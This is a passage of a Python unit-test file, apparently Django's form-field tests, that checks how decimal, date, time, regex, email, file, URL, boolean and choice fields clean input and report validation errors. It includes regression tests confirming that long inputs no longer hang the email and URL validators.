self.assertEqual(f.min_value, None)
def test_decimalfield_2(self):
f = DecimalField(max_digits=4, decimal_places=2, required=False)
self.assertEqual(None, f.clean(''))
self.assertEqual(None, f.clean(None))
self.assertEqual(f.clean('1'), Decimal("1"))
self.assertEqual(f.max_digits, 4)
self.assertEqual(f.decimal_places, 2)
self.assertEqual(f.max_value, None)
self.assertEqual(f.min_value, None)
def test_decimalfield_3(self):
f = DecimalField(max_digits=4, decimal_places=2, max_value=Decimal('1.5'), min_value=Decimal('0.5'))
self.assertWidgetRendersTo(f, '<input step="0.01" name="f" min="0.5" max="1.5" type="number" id="id_f" />')
self.assertRaisesMessage(ValidationError, "'Ensure this value is less than or equal to 1.5.'", f.clean, '1.6')
self.assertRaisesMessage(ValidationError, "'Ensure this value is greater than or equal to 0.5.'", f.clean, '0.4')
self.assertEqual(f.clean('1.5'), Decimal("1.5"))
self.assertEqual(f.clean('0.5'), Decimal("0.5"))
self.assertEqual(f.clean('.5'), Decimal("0.5"))
self.assertEqual(f.clean('00.50'), Decimal("0.50"))
self.assertEqual(f.max_digits, 4)
self.assertEqual(f.decimal_places, 2)
self.assertEqual(f.max_value, Decimal('1.5'))
self.assertEqual(f.min_value, Decimal('0.5'))
def test_decimalfield_4(self):
f = DecimalField(decimal_places=2)
self.assertRaisesMessage(ValidationError, "'Ensure that there are no more than 2 decimal places.'", f.clean, '0.00000001')
def test_decimalfield_5(self):
f = DecimalField(max_digits=3)
# Leading whole zeros "collapse" to one digit.
self.assertEqual(f.clean('0000000.10'), Decimal("0.1"))
# But a leading 0 before the . doesn't count towards max_digits
self.assertEqual(f.clean('0000000.100'), Decimal("0.100"))
# Only leading whole zeros "collapse" to one digit.
self.assertEqual(f.clean('000000.02'), Decimal('0.02'))
self.assertRaisesMessage(ValidationError, "'Ensure that there are no more than 3 digits in total.'", f.clean, '000000.0002')
self.assertEqual(f.clean('.002'), Decimal("0.002"))
def test_decimalfield_6(self):
f = DecimalField(max_digits=2, decimal_places=2)
self.assertEqual(f.clean('.01'), Decimal(".01"))
self.assertRaisesMessage(ValidationError, "'Ensure that there are no more than 0 digits before the decimal point.'", f.clean, '1.1')
def test_decimalfield_widget_attrs(self):
f = DecimalField(max_digits=6, decimal_places=2)
self.assertEqual(f.widget_attrs(Widget()), {})
self.assertEqual(f.widget_attrs(NumberInput()), {'step': '0.01'})
f = DecimalField(max_digits=10, decimal_places=0)
self.assertEqual(f.widget_attrs(NumberInput()), {'step': '1'})
f = DecimalField(max_digits=19, decimal_places=19)
self.assertEqual(f.widget_attrs(NumberInput()), {'step': '1e-19'})
f = DecimalField(max_digits=20)
self.assertEqual(f.widget_attrs(NumberInput()), {'step': 'any'})
def test_decimalfield_localized(self):
"""
Make sure localized DecimalField's widget renders to a text input with
no number input specific attributes.
"""
f = DecimalField(localize=True)
self.assertWidgetRendersTo(f, '<input id="id_f" name="f" type="text" />')
def test_decimalfield_changed(self):
f = DecimalField(max_digits=2, decimal_places=2)
d = Decimal("0.1")
self.assertFalse(f._has_changed(d, '0.10'))
self.assertTrue(f._has_changed(d, '0.101'))
with translation.override('fr'):
with self.settings(USE_L10N=True):
f = DecimalField(max_digits=2, decimal_places=2, localize=True)
localized_d = formats.localize_input(d) # -> '0,1' in French
self.assertFalse(f._has_changed(d, localized_d))
# DateField ###################################################################
def test_datefield_1(self):
f = DateField()
self.assertEqual(datetime.date(2006, 10, 25), f.clean(datetime.date(2006, 10, 25)))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(datetime.datetime(2006, 10, 25, 14, 30)))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59)))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59, 200)))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('2006-10-25'))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('10/25/2006'))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('10/25/06'))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('Oct 25 2006'))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('October 25 2006'))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('October 25, 2006'))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('25 October 2006'))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('25 October, 2006'))
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, '2006-4-31')
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, '200a-10-25')
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, '25/10/06')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
def test_datefield_2(self):
f = DateField(required=False)
self.assertEqual(None, f.clean(None))
self.assertEqual('None', repr(f.clean(None)))
self.assertEqual(None, f.clean(''))
self.assertEqual('None', repr(f.clean('')))
def test_datefield_3(self):
f = DateField(input_formats=['%Y %m %d'])
self.assertEqual(datetime.date(2006, 10, 25), f.clean(datetime.date(2006, 10, 25)))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(datetime.datetime(2006, 10, 25, 14, 30)))
self.assertEqual(datetime.date(2006, 10, 25), f.clean('2006 10 25'))
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, '2006-10-25')
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, '10/25/2006')
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, '10/25/06')
def test_datefield_4(self):
# Test whitespace stripping behavior (#5714)
f = DateField()
self.assertEqual(datetime.date(2006, 10, 25), f.clean(' 10/25/2006 '))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(' 10/25/06 '))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(' Oct 25 2006 '))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(' October 25 2006 '))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(' October 25, 2006 '))
self.assertEqual(datetime.date(2006, 10, 25), f.clean(' 25 October 2006 '))
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, ' ')
def test_datefield_5(self):
# Test null bytes (#18982)
f = DateField()
self.assertRaisesMessage(ValidationError, "'Enter a valid date.'", f.clean, 'a\x00b')
def test_datefield_changed(self):
format = '%d/%m/%Y'
f = DateField(input_formats=[format])
d = datetime.date(2007, 9, 17)
self.assertFalse(f._has_changed(d, '17/09/2007'))
def test_datefield_strptime(self):
"""Test that field.strptime doesn't raise an UnicodeEncodeError (#16123)"""
f = DateField()
try:
f.strptime('31 мая 2011', '%d-%b-%y')
except Exception as e:
# assertIsInstance or assertRaises cannot be used because UnicodeEncodeError
# is a subclass of ValueError
self.assertEqual(e.__class__, ValueError)
# TimeField ###################################################################
def test_timefield_1(self):
f = TimeField()
self.assertEqual(datetime.time(14, 25), f.clean(datetime.time(14, 25)))
self.assertEqual(datetime.time(14, 25, 59), f.clean(datetime.time(14, 25, 59)))
self.assertEqual(datetime.time(14, 25), f.clean('14:25'))
self.assertEqual(datetime.time(14, 25, 59), f.clean('14:25:59'))
self.assertRaisesMessage(ValidationError, "'Enter a valid time.'", f.clean, 'hello')
self.assertRaisesMessage(ValidationError, "'Enter a valid time.'", f.clean, '1:24 p.m.')
def test_timefield_2(self):
f = TimeField(input_formats=['%I:%M %p'])
self.assertEqual(datetime.time(14, 25), f.clean(datetime.time(14, 25)))
self.assertEqual(datetime.time(14, 25, 59), f.clean(datetime.time(14, 25, 59)))
self.assertEqual(datetime.time(4, 25), f.clean('4:25 AM'))
self.assertEqual(datetime.time(16, 25), f.clean('4:25 PM'))
self.assertRaisesMessage(ValidationError, "'Enter a valid time.'", f.clean, '14:30:45')
def test_timefield_3(self):
f = TimeField()
# Test whitespace stripping behavior (#5714)
self.assertEqual(datetime.time(14, 25), f.clean(' 14:25 '))
self.assertEqual(datetime.time(14, 25, 59), f.clean(' 14:25:59 '))
self.assertRaisesMessage(ValidationError, "'Enter a valid time.'", f.clean, ' ')
def test_timefield_changed(self):
t1 = datetime.time(12, 51, 34, 482548)
t2 = datetime.time(12, 51)
f = TimeField(input_formats=['%H:%M', '%H:%M %p'])
self.assertTrue(f._has_changed(t1, '12:51'))
self.assertFalse(f._has_changed(t2, '12:51'))
self.assertFalse(f._has_changed(t2, '12:51 PM'))
# DateTimeField ###############################################################
def test_datetimefield_1(self):
f = DateTimeField()
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean(datetime.date(2006, 10, 25)))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean(datetime.datetime(2006, 10, 25, 14, 30)))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 59), f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59)))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 59, 200), f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59, 200)))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45, 200), f.clean('2006-10-25 14:30:45.000200'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45, 200), f.clean('2006-10-25 14:30:45.0002'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45), f.clean('2006-10-25 14:30:45'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('2006-10-25 14:30:00'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('2006-10-25 14:30'))
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean('2006-10-25'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45, 200), f.clean('10/25/2006 14:30:45.000200'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45), f.clean('10/25/2006 14:30:45'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('10/25/2006 14:30:00'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('10/25/2006 14:30'))
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean('10/25/2006'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45, 200), f.clean('10/25/06 14:30:45.000200'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45), f.clean('10/25/06 14:30:45'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('10/25/06 14:30:00'))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('10/25/06 14:30'))
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean('10/25/06'))
self.assertRaisesMessage(ValidationError, "'Enter a valid date/time.'", f.clean, 'hello')
self.assertRaisesMessage(ValidationError, "'Enter a valid date/time.'", f.clean, '2006-10-25 4:30 p.m.')
def test_datetimefield_2(self):
f = DateTimeField(input_formats=['%Y %m %d %I:%M %p'])
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean(datetime.date(2006, 10, 25)))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean(datetime.datetime(2006, 10, 25, 14, 30)))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 59), f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59)))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 59, 200), f.clean(datetime.datetime(2006, 10, 25, 14, 30, 59, 200)))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean('2006 10 25 2:30 PM'))
self.assertRaisesMessage(ValidationError, "'Enter a valid date/time.'", f.clean, '2006-10-25 14:30:45')
def test_datetimefield_3(self):
f = DateTimeField(required=False)
self.assertEqual(None, f.clean(None))
self.assertEqual('None', repr(f.clean(None)))
self.assertEqual(None, f.clean(''))
self.assertEqual('None', repr(f.clean('')))
def test_datetimefield_4(self):
f = DateTimeField()
# Test whitespace stripping behavior (#5714)
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45), f.clean(' 2006-10-25 14:30:45 '))
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean(' 2006-10-25 '))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45), f.clean(' 10/25/2006 14:30:45 '))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30), f.clean(' 10/25/2006 14:30 '))
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean(' 10/25/2006 '))
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45), f.clean(' 10/25/06 14:30:45 '))
self.assertEqual(datetime.datetime(2006, 10, 25, 0, 0), f.clean(' 10/25/06 '))
self.assertRaisesMessage(ValidationError, "'Enter a valid date/time.'", f.clean, ' ')
def test_datetimefield_5(self):
f = DateTimeField(input_formats=['%Y.%m.%d %H:%M:%S.%f'])
self.assertEqual(datetime.datetime(2006, 10, 25, 14, 30, 45, 200), f.clean('2006.10.25 14:30:45.0002'))
def test_datetimefield_changed(self):
format = '%Y %m %d %I:%M %p'
f = DateTimeField(input_formats=[format])
d = datetime.datetime(2006, 9, 17, 14, 30, 0)
self.assertFalse(f._has_changed(d, '2006 09 17 2:30 PM'))
# RegexField ##################################################################
def test_regexfield_1(self):
f = RegexField('^\d[A-F]\d$')
self.assertEqual('2A2', f.clean('2A2'))
self.assertEqual('3F3', f.clean('3F3'))
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, '3G3')
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, ' 2A2')
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, '2A2 ')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
def test_regexfield_2(self):
f = RegexField('^\d[A-F]\d$', required=False)
self.assertEqual('2A2', f.clean('2A2'))
self.assertEqual('3F3', f.clean('3F3'))
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, '3G3')
self.assertEqual('', f.clean(''))
def test_regexfield_3(self):
f = RegexField(re.compile('^\d[A-F]\d$'))
self.assertEqual('2A2', f.clean('2A2'))
self.assertEqual('3F3', f.clean('3F3'))
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, '3G3')
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, ' 2A2')
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, '2A2 ')
def test_regexfield_4(self):
f = RegexField('^\d\d\d\d$', error_message='Enter a four-digit number.')
self.assertEqual('1234', f.clean('1234'))
self.assertRaisesMessage(ValidationError, "'Enter a four-digit number.'", f.clean, '123')
self.assertRaisesMessage(ValidationError, "'Enter a four-digit number.'", f.clean, 'abcd')
def test_regexfield_5(self):
f = RegexField('^\d+$', min_length=5, max_length=10)
self.assertRaisesMessage(ValidationError, "'Ensure this value has at least 5 characters (it has 3).'", f.clean, '123')
six.assertRaisesRegex(self, ValidationError, "'Ensure this value has at least 5 characters \(it has 3\)\.', u?'Enter a valid value\.'", f.clean, 'abc')
self.assertEqual('12345', f.clean('12345'))
self.assertEqual('1234567890', f.clean('1234567890'))
self.assertRaisesMessage(ValidationError, "'Ensure this value has at most 10 characters (it has 11).'", f.clean, '12345678901')
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, '12345a')
def test_regexfield_6(self):
"""
Ensure that it works with unicode characters.
Refs #.
"""
f = RegexField('^\w+$')
self.assertEqual('éèøçÎÎ你好', f.clean('éèøçÎÎ你好'))
def test_change_regex_after_init(self):
f = RegexField('^[a-z]+$')
f.regex = '^\d+$'
self.assertEqual('1234', f.clean('1234'))
self.assertRaisesMessage(ValidationError, "'Enter a valid value.'", f.clean, 'abcd')
# EmailField ##################################################################
# See also validators tests for validate_email specific tests
def test_emailfield_1(self):
f = EmailField()
self.assertWidgetRendersTo(f, '<input type="email" name="f" id="id_f" />')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual('person@example.com', f.clean('person@example.com'))
self.assertRaisesMessage(ValidationError, "'Enter a valid email address.'", f.clean, 'foo')
self.assertEqual('local@domain.with.idn.xyz\xe4\xf6\xfc\xdfabc.part.com',
f.clean('local@domain.with.idn.xyzäöüßabc.part.com'))
def test_email_regexp_for_performance(self):
f = EmailField()
# Check for the runaway regex security problem. This will take an extremely
# long time if the security fix isn't in place.
addr = 'viewx3dtextx26qx3d@yahoo.comx26latlngx3d15854521645943074058'
self.assertEqual(addr, f.clean(addr))
def test_emailfield_not_required(self):
f = EmailField(required=False)
self.assertEqual('', f.clean(''))
self.assertEqual('', f.clean(None))
self.assertEqual('person@example.com', f.clean('person@example.com'))
self.assertEqual('example@example.com', f.clean(' example@example.com \t \t '))
self.assertRaisesMessage(ValidationError, "'Enter a valid email address.'", f.clean, 'foo')
def test_emailfield_min_max_length(self):
f = EmailField(min_length=10, max_length=15)
self.assertWidgetRendersTo(f, '<input id="id_f" type="email" name="f" maxlength="15" />')
self.assertRaisesMessage(ValidationError, "'Ensure this value has at least 10 characters (it has 9).'", f.clean, 'a@foo.com')
self.assertEqual('alf@foo.com', f.clean('alf@foo.com'))
self.assertRaisesMessage(ValidationError, "'Ensure this value has at most 15 characters (it has 20).'", f.clean, 'alf123456788@foo.com')
# FileField ##################################################################
def test_filefield_1(self):
f = FileField()
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '', '')
self.assertEqual('files/test1.pdf', f.clean('', 'files/test1.pdf'))
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None, '')
self.assertEqual('files/test2.pdf', f.clean(None, 'files/test2.pdf'))
self.assertRaisesMessage(ValidationError, "'No file was submitted. Check the encoding type on the form.'", f.clean, SimpleUploadedFile('', b''))
self.assertRaisesMessage(ValidationError, "'No file was submitted. Check the encoding type on the form.'", f.clean, SimpleUploadedFile('', b''), '')
self.assertEqual('files/test3.pdf', f.clean(None, 'files/test3.pdf'))
self.assertRaisesMessage(ValidationError, "'No file was submitted. Check the encoding type on the form.'", f.clean, 'some content that is not a file')
self.assertRaisesMessage(ValidationError, "'The submitted file is empty.'", f.clean, SimpleUploadedFile('name', None))
self.assertRaisesMessage(ValidationError, "'The submitted file is empty.'", f.clean, SimpleUploadedFile('name', b''))
self.assertEqual(SimpleUploadedFile, type(f.clean(SimpleUploadedFile('name', b'Some File Content'))))
self.assertEqual(SimpleUploadedFile, type(f.clean(SimpleUploadedFile('我隻氣墊船裝滿晒鱔.txt', 'मेरी मँडराने वाली नाव सर्पमीनों से भरी ह'.encode('utf-8')))))
self.assertEqual(SimpleUploadedFile, type(f.clean(SimpleUploadedFile('name', b'Some File Content'), 'files/test4.pdf')))
def test_filefield_2(self):
f = FileField(max_length = 5)
self.assertRaisesMessage(ValidationError, "'Ensure this filename has at most 5 characters (it has 18).'", f.clean, SimpleUploadedFile('test_maxlength.txt', b'hello world'))
self.assertEqual('files/test1.pdf', f.clean('', 'files/test1.pdf'))
self.assertEqual('files/test2.pdf', f.clean(None, 'files/test2.pdf'))
self.assertEqual(SimpleUploadedFile, type(f.clean(SimpleUploadedFile('name', b'Some File Content'))))
def test_filefield_3(self):
f = FileField(allow_empty_file=True)
self.assertEqual(SimpleUploadedFile,
type(f.clean(SimpleUploadedFile('name', b''))))
def test_filefield_changed(self):
'''
Test for the behavior of _has_changed for FileField. The value of data will
more than likely come from request.FILES. The value of initial data will
likely be a filename stored in the database. Since its value is of no use to
a FileField it is ignored.
'''
f = FileField()
# No file was uploaded and no initial data.
self.assertFalse(f._has_changed('', None))
# A file was uploaded and no initial data.
self.assertTrue(f._has_changed('', {'filename': 'resume.txt', 'content': 'My resume'}))
# A file was not uploaded, but there is initial data
self.assertFalse(f._has_changed('resume.txt', None))
# A file was uploaded and there is initial data (file identity is not dealt
# with here)
self.assertTrue(f._has_changed('resume.txt', {'filename': 'resume.txt', 'content': 'My resume'}))
# URLField ##################################################################
def test_urlfield_1(self):
f = URLField()
self.assertWidgetRendersTo(f, '<input type="url" name="f" id="id_f" />')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual('http://localhost/', f.clean('http://localhost'))
self.assertEqual('http://example.com/', f.clean('http://example.com'))
self.assertEqual('http://example.com./', f.clean('http://example.com.'))
self.assertEqual('http://www.example.com/', f.clean('http://www.example.com'))
self.assertEqual('http://www.example.com:8000/test', f.clean('http://www.example.com:8000/test'))
self.assertEqual('http://valid-with-hyphens.com/', f.clean('valid-with-hyphens.com'))
self.assertEqual('http://subdomain.domain.com/', f.clean('subdomain.domain.com'))
self.assertEqual('http://200.8.9.10/', f.clean('http://200.8.9.10'))
self.assertEqual('http://200.8.9.10:8000/test', f.clean('http://200.8.9.10:8000/test'))
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'foo')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://example')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://example.')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'com.')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, '.')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://.com')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://invalid-.com')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://-invalid.com')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://inv-.alid-.com')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://inv-.-alid.com')
self.assertEqual('http://valid-----hyphens.com/', f.clean('http://valid-----hyphens.com'))
self.assertEqual('http://some.idn.xyz\xe4\xf6\xfc\xdfabc.domain.com:123/blah', f.clean('http://some.idn.xyzäöüßabc.domain.com:123/blah'))
self.assertEqual('http://www.example.com/s/http://code.djangoproject.com/ticket/13804', f.clean('www.example.com/s/http://code.djangoproject.com/ticket/13804'))
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, '[a')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://[a')
def test_url_regex_ticket11198(self):
f = URLField()
# hangs "forever" if the catastrophic backtracking from ticket #11198 is not fixed
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://%s' % ("X"*200,))
# a second test, to make sure the problem is really addressed, even on
# domains that don't fail the domain label length check in the regex
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://%s' % ("X"*60,))
def test_urlfield_2(self):
f = URLField(required=False)
self.assertEqual('', f.clean(''))
self.assertEqual('', f.clean(None))
self.assertEqual('http://example.com/', f.clean('http://example.com'))
self.assertEqual('http://www.example.com/', f.clean('http://www.example.com'))
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'foo')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://example')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://example.')
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 'http://.com')
def test_urlfield_5(self):
f = URLField(min_length=15, max_length=20)
self.assertWidgetRendersTo(f, '<input id="id_f" type="url" name="f" maxlength="20" />')
self.assertRaisesMessage(ValidationError, "'Ensure this value has at least 15 characters (it has 13).'", f.clean, 'http://f.com')
self.assertEqual('http://example.com/', f.clean('http://example.com'))
self.assertRaisesMessage(ValidationError, "'Ensure this value has at most 20 characters (it has 38).'", f.clean, 'http://abcdefghijklmnopqrstuvwxyz.com')
def test_urlfield_6(self):
f = URLField(required=False)
self.assertEqual('http://example.com/', f.clean('example.com'))
self.assertEqual('', f.clean(''))
self.assertEqual('https://example.com/', f.clean('https://example.com'))
def test_urlfield_7(self):
f = URLField()
self.assertEqual('http://example.com/', f.clean('http://example.com'))
self.assertEqual('http://example.com/test', f.clean('http://example.com/test'))
def test_urlfield_8(self):
# ticket #11826
f = URLField()
self.assertEqual('http://example.com/?some_param=some_value', f.clean('http://example.com?some_param=some_value'))
def test_urlfield_9(self):
f = URLField()
urls = (
'http://עברית.idn.icann.org/',
'http://sãopaulo.com/',
'http://sãopaulo.com.br/',
'http://пример.испытание/',
'http://مثال.إختبار/',
'http://例子.测试/',
'http://例子.測試/',
'http://उदाहरण.परीक्षा/',
'http://例え.テスト/',
'http://مثال.آزمایشی/',
'http://실례.테스트/',
'http://العربية.idn.icann.org/',
)
for url in urls:
# Valid IDN
self.assertEqual(url, f.clean(url))
def test_urlfield_10(self):
"""Test URLField correctly validates IPv6 (#18779)."""
f = URLField()
urls = (
'http://::/',
'http://6:21b4:92/',
'http://[12:34:3a53]/',
'http://[a34:9238::]:8080/',
)
for url in urls:
self.assertEqual(url, f.clean(url))
def test_urlfield_not_string(self):
f = URLField(required=False)
self.assertRaisesMessage(ValidationError, "'Enter a valid URL.'", f.clean, 23)
# BooleanField ################################################################
def test_booleanfield_1(self):
f = BooleanField()
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual(True, f.clean(True))
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, False)
self.assertEqual(True, f.clean(1))
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, 0)
self.assertEqual(True, f.clean('Django rocks'))
self.assertEqual(True, f.clean('True'))
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, 'False')
def test_booleanfield_2(self):
f = BooleanField(required=False)
self.assertEqual(False, f.clean(''))
self.assertEqual(False, f.clean(None))
self.assertEqual(True, f.clean(True))
self.assertEqual(False, f.clean(False))
self.assertEqual(True, f.clean(1))
self.assertEqual(False, f.clean(0))
self.assertEqual(True, f.clean('1'))
self.assertEqual(False, f.clean('0'))
self.assertEqual(True, f.clean('Django rocks'))
self.assertEqual(False, f.clean('False'))
self.assertEqual(False, f.clean('false'))
self.assertEqual(False, f.clean('FaLsE'))
def test_boolean_picklable(self):
self.assertIsInstance(pickle.loads(pickle.dumps(BooleanField())), BooleanField)
def test_booleanfield_changed(self):
f = BooleanField()
self.assertFalse(f._has_changed(None, None))
self.assertFalse(f._has_changed(None, ''))
self.assertFalse(f._has_changed('', None))
self.assertFalse(f._has_changed('', ''))
self.assertTrue(f._has_changed(False, 'on'))
self.assertFalse(f._has_changed(True, 'on'))
self.assertTrue(f._has_changed(True, ''))
# Initial value may have mutated to a string due to show_hidden_initial (#19537)
self.assertTrue(f._has_changed('False', 'on'))
# ChoiceField #################################################################
def test_choicefield_1(self):
f = ChoiceField(choices=[('1', 'One'), ('2', 'Two')])
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, None)
self.assertEqual('1', f.clean(1))
self.assertEqual('1', f.clean('1'))
self.assertRaisesMessage(ValidationError, "'Select a valid choice. 3 is not one of the available choices.'", f.clean, '3')
def test_choicefield_2(self):
f = ChoiceField(choices=[('1', 'One'), ('2', 'Two')], required=False)
self.assertEqual('', f.clean(''))
self.assertEqual('', f.clean(None))
self.assertEqual('1', f.clean(1))
self.assertEqual('1', f.clean('1'))
self.assertRaisesMessage(ValidationError, "'Select a valid choice. 3 is not one of the available choices.'", f.clean, '3')
def test_choicefield_3(self):
f = ChoiceField(choices=[('J', 'John'), ('P', 'Paul')])
self.assertEqual('J', f.clean('J'))
self.assertRaisesMessage(ValidationError, "'Select a valid choice. John is not one of the available choices.'", f.clean, 'John')
def test_choicefield_4(self):
f = ChoiceField(choices=[('Numbers', (('1', 'One'), ('2', 'Two'))), ('Letters', (('3','A'),('4','B'))), ('5','Other')])
self.assertEqual('1', f.clean(1))
self.assertEqual('1', f.clean('1'))
self.assertEqual('3', f.clean(3))
self.assertEqual('3', f.clean('3'))
self.assertEqual('5', f.clean(5))
self.assertEqual('5', f.clean('5'))
self.assertRaisesMessage(ValidationError, "'Select a valid choice. 6 is not one of the available choices.'", f.clean, '6')
# TypedChoiceField ############################################################
# TypedChoiceField is just like ChoiceField, except that coerced types will
# be returned:
def test_typedchoicefield_1(self):
f = TypedChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int)
self.assertEqual(1, f.clean('1'))
self.assertRaisesMessage(ValidationError, "'Select a valid choice. 2 is not one of the available choices.'", f.clean, '2')
def test_typedchoicefield_2(self):
# Different coercion, same validation.
f = TypedChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=float)
self.assertEqual(1.0, f.clean('1'))
def test_typedchoicefield_3(self):
# This can also cause weirdness: be careful (bool(-1) == True, remember)
f = TypedChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=bool)
self.assertEqual(True, f.clean('-1'))
def test_typedchoicefield_4(self):
# Even more weirdness: if you have a valid choice but your coercion function
# can't coerce, you'll still get a validation error. Don't do this!
f = TypedChoiceField(choices=[('A', 'A'), ('B', 'B')], coerce=int)
self.assertRaisesMessage(ValidationError, "'Select a valid choice. B is not one of the available choices.'", f.clean, 'B')
# Required fields require values
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, '')
def test_typedchoicefield_5(self):
# Non-required fields aren't required
f = TypedChoiceField(choices=[(1, "+1"), (-1, "-1")], coerce=int, required=False)
self.assertEqual('', f.clean(''))
